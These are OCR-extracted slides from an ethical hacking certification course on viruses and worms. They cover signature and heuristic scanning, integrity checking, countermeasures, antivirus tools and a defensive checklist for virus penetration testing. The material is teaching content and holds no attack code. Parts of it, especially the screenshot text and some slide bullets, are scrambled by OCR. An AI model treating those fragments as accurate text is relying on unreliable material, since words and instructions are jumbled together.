  • 93. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker S can n in g Q The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus). © The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory files and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected. 0 Virus writers often create many new viruses by altering the existing one. What looks like a new virus, may have taken just a few minutes to be created. Attackers make these changes frequently to throw off the scanners. © In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file. © In another possibility, the scanner sets up a virtual computer in the RAM and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content. e The major advantages of scanners are: © They can check programs before they are executed. Q It is the easiest way to check new software for any known or malicious virus. Q The major drawbacks to scanners are: Q Old scanners could prove to be unreliable. With the tremendous increase in new viruses old scanners can quickly become obsolete. It is best to use the latest scanners available on the market. Q Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them. In te g rity C h e c k in g 0 Integrity checking products perform their functions by reading and recording integrated data to develop a signature or base line for those files and system sectors. Q Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line. Module 07 Page 1098 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 94. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Q A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus. Q However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process. In te rc e p tio n 0 The main use of an interceptor is for deflecting logic bombs and Trojans. Q The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct instructions for input and output instructions by the virus. In some cases, the virus is capable of disabling the monitoring program itself. Some years back it took only eight bytes of code for a widely used antivirus program to turn off its monitoring functions. Module 07 Page 1099 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 95. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker V iru s a n d W o rm s C o u n te r m e a s u r e s CEH Install anti-virus software that detects and removes infections as they appear Generate an anti-virus policy for safe computing and distribute it to the staff Pay attention to the instructions while downloading files or any programs from the Internet Update the anti-virus software regularly Avoid opening the attachments received from an unknown sender as viruses spread via e-mail attachments Possibility of virus infection may corrupt data, thus regularly maintain data back up Schedule regular scans for all drives after the installation of anti-virus software Do not accept disks or programs without checking them first using a current version of an antivirus program Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. V irus an d W orm s C o u n te rm e a su re s Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include: 0 Install antivirus software that detects and removes infections as they appear © Generate an antivirus policy for safe computing and distribute it to the staff 0 Pay attention to the instructions while downloading files or any programs from the Internet 0 Update the antivirus software on the a monthly basis, so that it can identify and clean out new bugs 0 Avoid opening the attachments received from an unknown sender as viruses spread via email attachments 0 Possibility of virus infection may corrupt data, thus regularly maintain data back up 0 Schedule regular scans for all drives after the installation of antivirus software 0 Do not accept disks or programs without checking them first using acurrent version of an antivirus program Module 07 Page 1100 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 96. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker V iru s a n d W o rm s C o u n te r m e a s u r e s (C o n t'd ) EH Run disk clean up, registry scanner and defragmentation once a week Ensure the executable code sent to the organization is approved Turn on the firewall if the OS used Do not boot the machine with infected bootable system disk is Windows XP Run anti-spyware oradware once in a week Know about the latest virus threats Block the files with more than one file type extension Check the DVD and CDs for virus infection QW Be cautious with the files being sent through the instant messenger Ensure the pop-up blocker is turned on and use an Internet firewall ^1 Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited V irus an d W orm s C o u n te rm e a su re s (C ont’d) 0 Ensure the executable code sent to the organization is approved 0 Run disk clean up, registry scanner, and defragmentation once a week 0 Do not boot the machine with infected bootable system disk 0 Turn on the firewall if the OS used is Windows XP 0 Keep informed about the latest virus threats 0 Run anti-spyware or adware once in a week 0 Check the DVDs and CDs for virus infection 0 Block the files with more than one file type extension 0 Ensure the pop-up blocker is turned on and use an Internet firewall 0 Be cautious with the files being sent through the instant messenger Module 07 Page 1101 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 97. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Companion Antivirus: Immunet CEH ■Immunet 1□ A Community 2.478,268 people protected Community! <‫׳‬ 2 I 1 community My | - I olt Greph I Mt e oirs | t-njneiCoTi-niritr Nofices | Product Computerl 5 n or1 • m ‫״‬ tV n :. SO T.. ‫ך‬ ■ Summary ■Immunet 1□P9*VCCt> ^ I j i l f H to ^ is r^ ^ ■ 1 DtUledHfctory ( Cuera-^v*■ I a«t sranrxvl 10yS/20126:46:50PM ) Scan j j Scan Complete I Res Seamed: Maximize Y ^ iy Br 203228 Threars Defected: Uoorade to immunet Plus 3.0 and you wiH recove: ‫ ״‬AnWrjs81Anawywj(fl •Em Da'jbaw Sunt I ail •A ced RootkitRem dvan oval •En an Com T d h ced ota h *Offlineprotection •T n Suptwt ech ical I 306 Threats Removed: 396 llapsed lime: ^ »J T aT YowKjn j ca* h«convi*1K!. 1hr«att wwedetected and Unc 0:4‫94:ל‬ | Scan History | http://www.im unet.com m Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. C o m p an io n A ntivirus: Im m u n e t Source: http://www.immunet.com Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under protected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protects detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet. Module 07 Page 1102 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 98. Ethical Hacking and Countermeasures Viruses and Worms ■ImmunGtlO Exam 312-50 Certified Ethical Hacker $d, ‫״‬ ‫״‬ FIGURE 7.33: Immunet Screenshot Module 07 Page 1103 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 99. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Anti-virus Tools CEH Urt1fw4 AVG Antivirus F-Secure Anti-Virus http ://free . avg. com http://w w w .f■secure, com BitDefender Kaspersky Anti-Virus M . h ttp ://w w w .k a sp e rs k y.co m Trend Micro Internet Security Pro h ttp ://ap ac. trendmicro. com Norton AntiVirus h ttp :/ / w w w . s ym antec. com Avast Pro Antivirus N h ttp :/ / w w w . bit defender, com ' 12/ ‫׳‬ ilhiul lUtbM h ttp :/ /w w w . avas t. com McAfee AntiVirus Plus 2013 i L 1 E !y 9 | h ttp://hom e.m cafee.com ESET Smart Security 6 h ttp ://w w w .e se t.co m Total Defense Internet Security Suite h ttp ://w w w .totald e fe nse.com Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited. A ntivirus Tools Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these tools monitor the network's traffic for malicious activities. A few antivirus tools that can be used for the purpose of detecting and killing the viruses in the systems are listed as follows: 0 AVG Antivirus available at http://free.avg.com 0 BitDefender available at http://www.bitdefender.com 0 Kaspersky Anti-Virus available at http://www.kaspersky.com 0 Trend Micro Internet Security Pro available at http://apac.trendmicro.com 0 Norton Anti-Virus available at http://www.svmantec.com 0 F-Secure Anti-Virus available at http://www.f-secure.com 0 Avast Pro Antivirus available at http://www.avast.com 0 McAfee Anti-Virus Plus 2013 available at http://home.mcafee.com 0 ESET Smart Security 5 available at http://www.eset.com 0 Total Defense Internet Security Suite available at http://www.totaldefense.com Module 07 Page 1104 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 100. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Module Flow C EH T y p e s o f V ir u s e s C o m p u te r W o rm s C o u n te r- M a lw a r e m e a s u re s A n a ly s is Copyright © by R-C m B C I. All Rights Reserved. Reproduction is Strictly Prohibited. M odule Flow Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack. They do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it Virus and Worms Concept ^ • Types of Viruses y— y— Computer Worms — Malware Analysis Countermeasures ^ Z ‫ )׳‬Penetration Testing This section provides insight into virus and worm pen testing. Module 07 Page 1105 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 101. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Pen etratio n Testing for V iru s CEH Install an anti-virus program on the network infrastructure and on the end-user's system Update the anti-virus software to update your virus database of the newly identified viruses Scan the system for viruses, which helps to repair damage or delete files infected with viruses 4‫ י‬v i m J m VIRUS . Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P e n e tra tio n T estin g for V iru ses Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms and try to inject them in a dummy network (virtual machine) and check whether they are detected by antivirus programs or able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test: Stepl: Install an antivirus program You should install an antivirus program on the network infrastructure and on the end-user's system before conducting the penetration test. Step2: Update the antivirus software Check whether your antivirus is updated or not. If not, update your antivirus software. Step3: Scan the system for viruses You should try to scan your target system; this will help you to repair damage or delete files infected with viruses. Module 07 Page 1106 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 102. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Penetration Testing for Virus CEH (C o n t’d) > System is not infected S et the anti-virus to quarantine or delete the virus Virus is removed? ‫>׳‬ System is safe IX V ____ Go to safe m ode and delete the infected file manually Set the anti-virus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible or delete them if not Ifthe virus is not removed then go to safe mode and delete the infected file manually Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P e n e tra tio n T estin g for V iru ses (C ont’d) Step4: Set the antivirus to quarantine or delete the virus Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not. Step5: Go to safe mode and delete the infected file manually Ifthe virus is not removed, then go to safe mode and delete the infected file manually. Module 07 Page 1107 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 103. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Penetration Testing for Virus £ £H (C o n t’d) UrtifM | itk iu l t tm U k 9 Scan the system for running processes, registry entries, startup programs, files and folders integrity and services Q If any suspicious process, registry entry, startup program or service is discovered, check the associated executable files 0 Use tools such as What's Running and Winsonar Collect more information about these from publisher's websites if available, and Internet 0 Check the startup programs and determine if all the programs in the list can be recognized with known functionalities Use tools such as jvl6 Power Tools 2012 and Reg Organizer Use tools such as SrvManand ServiWin Scan for Windows services Use tools such as Starter, Security AutoRun, and Autoruns Scan for startup programs Scan for files and folders integrity <■ Check the data files for modification or manipulation by opening several files and comparing hash value of these files with a pre-computed hash Use tools such as FCIV, TRIPWIRE, and SIGVERIF Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P e n e tra tio n T estin g for V iru ses (C ont’d) Step 6: Scan the system for running processes You should scan your system for suspicious running process. You can do this by using tools such as What's Running, HijackThis, etc. Step7: Scan the system for suspicious registry entries You should scan your system for suspicious registry entries. You can do this by using tools such as JV Power Tools and RegShot. Step8: Scan the system for Windows services You should scan suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin. Step9: Scan the system for startup programs You should scan your system for suspicious startup programs running on your system. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs. Step 10: Scan the system for files and folders integrity You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF. Module 07 Page 1108 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 104. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Penetration Testing for Virus (C o n t’d) Document all the findings Document all your findings in previous steps; it helps in determining the next action if viruses are identified inthe system 8 v Check the critical OS file modification or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy 0 Use tools such as FCIV and TRIPWIRE 0 Isolate infected system from the network immediately to prevent further infection t) Scan for modification to OS files Sanitize the complete system for viruses using an updated anti-virus Find other anti-virus solution to clean viruses Isolate the machine from network Update and run antivirus Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P e n e tra tio n T estin g for V iru ses (C ont’d) Step 11: Scan the system for critical OS modifications You can scan critical OS file modifications or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy. Step 12: Document all findings These findings can help you determine the next action if viruses are identified on the system. Stepl3: Isolate the infected system Once an infected system is identified, you should isolate the infected system from the network immediately in order to prevent further infection. Stepl4: Sanitize the complete infected system You should remove virus infections from your system by using the latest updated antivirus software. Module 07 Page 1109 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 105. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker M odule S um m ary □ | 0 Virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction □ Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre determine logical circumstance is met □ Viruses are categorized according to file they infect and the way they work □ Lifecycle of virus and worms include designing, replication, launching, detection, incorporation and elimination stages □ Computer gets infected by Virus, worms and other malware due to not running the latest anti-virus application, not updating and not installing new versions of plug-ins, installing the pirated software, opening the infected e-mail attachments or downloading files without checking properly for the source □ Several virus and worm development kits such as JPS Virus Maker are available in wild that can be used create malware without any technical knowledge □ Virus detection methods include system scanning, file integrity checking and monitoring OS requests □ Virus and worm countermeasures include installing anti-virus software and following anti-virus policy for safe computing - M odule S u m m ary © A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction. © Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met. © Viruses are categorized according to file they infect and the way they work. © The lifecycle of virus and worms include designing, replication, launching, detection, incorporation, and elimination stages. © A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without checking properly for the source. © Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used create malware without any technical knowledge. Module 07 Page 1110 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 106. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker © Virus detection methods monitoring OS requests. © Virus and worm countermeasures include installing antivirus software and following antivirus policies for safe computing. Module 07 Page 1111 include system scanning, file integrity checking, and Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

×